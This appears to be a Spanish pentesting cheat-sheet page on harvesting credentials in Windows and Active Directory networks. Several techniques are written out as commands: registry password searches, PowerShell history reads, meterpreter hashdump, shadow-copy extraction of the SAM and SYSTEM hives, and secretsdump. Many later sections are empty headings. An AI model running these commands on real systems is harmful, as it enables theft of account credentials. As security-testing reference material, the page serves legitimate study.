🔑Recolección de Credenciales

Diferentes técnicas con las que obtener credenciales en una red Windows

Archivos en Texto Plano

Comprobar el historial de comandos de PowerShell
type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
Buscar por Palabra Clave en el Registro de Windows
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Extraer Credenciales del SAM

Técnicas para obtener credenciales de cuentas de usuario local

Metasploit Hashdump

En el caso de tener una meterpreter en la máquina comprometida
meterpreter > hashdump

Volume Shadow Copy Service

Copia del disco con wmic
wmic shadowcopy call create Volume='C:\\'
Verificar copia existosa
vssadmin list shadows
Copiar SAM y SYSTEM desde la copia del volumen
copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam C:\\users\\Administrator\\Desktop\\sam
copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system C:\\users\\Administrator\\Desktop\\system
Hash dump con secredump.py en máquina local
python3 /opt/impacket/examples/secretsdump.py -sam <sam> -system <system> LOCAL

Registry Hives

Extraer Credenciales del LSASS

Técnicas para volcar las credenciales del sistema mediante el proceso lsass.exe

Sysinternals Suite

Protected LSASS

Windows Credential Manager

Técnicas para volcar las credenciales almacenadas del sistema

Acceder al WCM

Volcar Credenciales Web con PowerShell

RunAs

Mimikatz

Hashes del Domain Controller

Técnicas para volcar los hashes del Domain Controller de manera local y remota.

Volcado Local (Sin Credenciales)

En caso de no tener credenciales válidas pero sí acceso administrativo al DC.

  • Archivos necesarios:

    • C:\Windows\NTDS\ntds.dit

    • C:\Windows\System32\config\SYSTEM

    • C:\Windows\System32\config\SECURITY

Volcado Remoto (Con Credenciales)

Técnica para volcar los hashes del sistema y del DC de manera remota con credenciales válidas

Ataque DC Sync

  • Permisos Necesarios:

    • Replicating Directory Changes

    • Replicating Directory Changes All

    • Replicating Directory Changes in Filtered Set

Extraer Credenciales del LAPS

Técnica para enumerar y obtener credenciales de un administrador local de un entorno AD si está configurada y habilitada la función LAPS.

Enumerar función LAPS

Obtener Credenciales

Otros Ataques

Ataques extra sobre un entorno AD para obtener credenciales

Kerberoasting

Enumeración

Explotación

AS-REP Roasting

  • Necesita enumeración previa de usuarios válidos

Última actualización